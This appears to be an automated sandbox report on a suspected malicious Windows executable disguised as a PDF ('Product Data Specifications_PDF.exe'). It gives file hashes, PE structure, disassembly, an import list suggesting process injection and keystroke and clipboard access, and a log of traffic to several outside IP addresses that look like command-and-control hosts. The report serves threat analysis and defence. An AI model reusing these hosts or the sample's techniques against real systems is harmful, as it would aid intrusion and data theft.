                            Preview:.....NCXM..S....{.T[..pNM...8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXM.JFZ6G.9G.].g.B..d..3Kx4E(6&9+n 9#+%2zZ=dE2?t1(n...e')>]vI:MuTXFNCXM<KO..8#.z13.{.$.W..`X?.-...d&).B..z:_..^$9i8!.CXMEJFZ8..7G.UYF....EJFZ8XD7.QVYMOHXM.NFZ8XD7GQT.RNCX]EJF*<XD7.QTHFNCZMELFZ8XD7GWTXFNCXME:BZ8ZD7GQTXDN..MEZFZ(XD7GATXVNCXMEJVZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCv9 22Z8X@bCQTHFNC.IEJVZ8XD7GQTXFNCXMeJF:8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8XD7GQTXFNCXMEJFZ8

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.526936847926212
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:Product Data Specifications_PDF.exe
                            File size:1'335'877 bytes
                            MD5:94cc1457803df28f1d4c7a39db96e956
                            SHA1:0b1f19f44e162dcc5e06d5619b0e72d3e654293b
                            SHA256:64f6025326f3f7edca173d44ef56a85198b28c132b7e0afd3b599ccc3b593624
                            SHA512:992d7b45b4f870e83723acdd748e24b492edbc4951720ecad7581cab7cbc617e10554b24d75c55649100ab3728e652808314ce3bee8efd55a9fccd8d259bc0f5
                            SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCMNJY88f8po1dSD9lIFd97:7JZoQrbTFZY1iaCMNJY8e8pofSD9Of1
                            TLSH:7755F121F5C58036C2B323B19E7EF76A963979360336D2D727C82E315EA05416B2A773
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                            File Icon

                            Icon Hash:1733312925935517

                            Static PE Info

                            General

                            Entrypoint:0x4165c1
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            DLL Characteristics:TERMINAL_SERVER_AWARE
                            Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:0
                            File Version Major:5
                            File Version Minor:0
                            Subsystem Version Major:5
                            Subsystem Version Minor:0
                            Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                            Entrypoint Preview

                            Instruction
                            call 00007F3B98EF7D7Bh
                            jmp 00007F3B98EEEBEEh
                            int3
                            int3
                            int3
                            int3
                            int3
                            push ebp
                            mov ebp, esp
                            push edi
                            push esi
                            mov esi, dword ptr [ebp+0Ch]
                            mov ecx, dword ptr [ebp+10h]
                            mov edi, dword ptr [ebp+08h]
                            mov eax, ecx
                            mov edx, ecx
                            add eax, esi
                            cmp edi, esi
                            jbe 00007F3B98EEED6Ah
                            cmp edi, eax
                            jc 00007F3B98EEEF06h
                            cmp ecx, 00000080h
                            jc 00007F3B98EEED7Eh
                            cmp dword ptr [004A9724h], 00000000h
                            je 00007F3B98EEED75h
                            push edi
                            push esi
                            and edi, 0Fh
                            and esi, 0Fh
                            cmp edi, esi
                            pop esi
                            pop edi
                            jne 00007F3B98EEED67h
                            jmp 00007F3B98EEF142h
                            test edi, 00000003h
                            jne 00007F3B98EEED76h
                            shr ecx, 02h
                            and edx, 03h
                            cmp ecx, 08h
                            jc 00007F3B98EEED8Bh
                            rep movsd
                            jmp dword ptr [00416740h+edx*4]
                            mov eax, edi
                            mov edx, 00000003h
                            sub ecx, 04h
                            jc 00007F3B98EEED6Eh
                            and eax, 03h
                            add ecx, eax
                            jmp dword ptr [00416654h+eax*4]
                            jmp dword ptr [00416750h+ecx*4]
                            nop
                            jmp dword ptr [004166D4h+ecx*4]
                            nop
                            inc cx
                            add byte ptr [eax-4BFFBE9Ah], dl
                            inc cx
                            add byte ptr [ebx], ah
                            ror dword ptr [edx-75F877FAh], 1
                            inc esi
                            add dword ptr [eax+468A0147h], ecx
                            add al, cl
                            jmp 00007F3B9B367567h
                            add esi, 03h
                            add edi, 03h
                            cmp ecx, 08h
                            jc 00007F3B98EEED2Eh
                            rep movsd
                            jmp dword ptr [00000000h+edx*4]

                            Rich Headers

                            Programming Language:
                            • [ C ] VS2010 SP1 build 40219
                            • [C++] VS2010 SP1 build 40219
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [ASM] VS2010 SP1 build 40219
                            • [RES] VS2010 SP1 build 40219
                            • [LNK] VS2010 SP1 build 40219

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                            RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                            RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                            RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                            RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                            RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                            RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                            RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                            RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                            RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                            RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                            RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                            RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                            RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                            RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                            RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                            RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                            RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                            RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                            RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                            RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                            RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                            RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                            RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                            RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                            RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                            RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                            Imports

                            DLLImport
                            WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                            VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                            COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                            MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                            WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                            PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                            USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                            KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                            USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                            GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                            COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                            ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                            SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                            ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                            OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            EnglishGreat Britain
                            EnglishUnited States

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 26, 2024 15:24:02.976566076 CEST4970480192.168.2.7195.161.68.8
                            Sep 26, 2024 15:24:02.984253883 CEST8049704195.161.68.8192.168.2.7
                            Sep 26, 2024 15:24:02.984395981 CEST4970480192.168.2.7195.161.68.8
                            Sep 26, 2024 15:24:02.991679907 CEST4970480192.168.2.7195.161.68.8
                            Sep 26, 2024 15:24:02.997970104 CEST8049704195.161.68.8192.168.2.7
                            Sep 26, 2024 15:24:03.749346972 CEST8049704195.161.68.8192.168.2.7
                            Sep 26, 2024 15:24:03.749752045 CEST8049704195.161.68.8192.168.2.7
                            Sep 26, 2024 15:24:03.749911070 CEST4970480192.168.2.7195.161.68.8
                            Sep 26, 2024 15:24:03.753643990 CEST4970480192.168.2.7195.161.68.8
                            Sep 26, 2024 15:24:03.758582115 CEST8049704195.161.68.8192.168.2.7
                            Sep 26, 2024 15:24:19.189512014 CEST4970680192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:19.194375992 CEST804970645.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:19.194482088 CEST4970680192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:19.204349041 CEST4970680192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:19.209177971 CEST804970645.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:20.048789024 CEST804970645.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:20.048981905 CEST804970645.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:20.049041986 CEST4970680192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:20.725394964 CEST4970680192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:21.736705065 CEST4970780192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:21.742588997 CEST804970745.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:21.742716074 CEST4970780192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:21.753019094 CEST4970780192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:21.757906914 CEST804970745.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:22.593822002 CEST804970745.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:22.594461918 CEST804970745.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:22.594542027 CEST4970780192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:23.264966965 CEST4970780192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:24.406148911 CEST4970880192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:24.412144899 CEST804970845.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:24.412237883 CEST4970880192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:24.422683954 CEST4970880192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:24.430037975 CEST804970845.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:24.430048943 CEST804970845.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:25.278573036 CEST804970845.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:25.279334068 CEST804970845.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:25.279459953 CEST4970880192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:25.936738968 CEST4970880192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:26.955931902 CEST4970980192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:26.960985899 CEST804970945.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:26.961096048 CEST4970980192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:26.967686892 CEST4970980192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:26.972629070 CEST804970945.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:27.817737103 CEST804970945.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:27.820002079 CEST804970945.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:27.820106983 CEST4970980192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:27.820975065 CEST4970980192.168.2.745.114.171.236
                            Sep 26, 2024 15:24:27.827094078 CEST804970945.114.171.236192.168.2.7
                            Sep 26, 2024 15:24:32.884608984 CEST4971080192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:32.889611959 CEST804971084.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:32.889724016 CEST4971080192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:32.899966002 CEST4971080192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:32.904865026 CEST804971084.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:33.351051092 CEST804971084.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:33.351298094 CEST4971080192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:34.405554056 CEST4971080192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:34.410444021 CEST804971084.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:35.425514936 CEST4971180192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:35.430438042 CEST804971184.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:35.430609941 CEST4971180192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:35.441225052 CEST4971180192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:35.446218014 CEST804971184.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:35.909435034 CEST804971184.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:35.909492970 CEST4971180192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:36.954076052 CEST4971180192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:36.959276915 CEST804971184.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:37.971204996 CEST4971280192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:37.976160049 CEST804971284.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:37.976272106 CEST4971280192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:37.986656904 CEST4971280192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:37.991548061 CEST804971284.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:37.991744041 CEST804971284.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:38.466964006 CEST804971284.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:38.467160940 CEST4971280192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:39.499336004 CEST4971280192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:39.504317999 CEST804971284.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.518467903 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.523565054 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.523688078 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.530927896 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.535789013 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978070021 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978085995 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978123903 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978133917 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978141069 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978148937 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978156090 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978173018 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978209972 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978218079 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978322983 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.978387117 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.978411913 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:40.978461981 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.982903957 CEST4971380192.168.2.784.32.84.32
                            Sep 26, 2024 15:24:40.987744093 CEST804971384.32.84.32192.168.2.7
                            Sep 26, 2024 15:24:54.217747927 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:54.222919941 CEST8049714161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:54.223033905 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:54.241308928 CEST4971480192.168.2.7161.97.168.245
                            Sep 26, 2024 15:24:54.246730089 CEST8049714161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:54.893639088 CEST8049714161.97.168.245192.168.2.7
                            Sep 26, 2024 15:24:54.893779039 CEST8049714161.97.168.245192.168.2.7
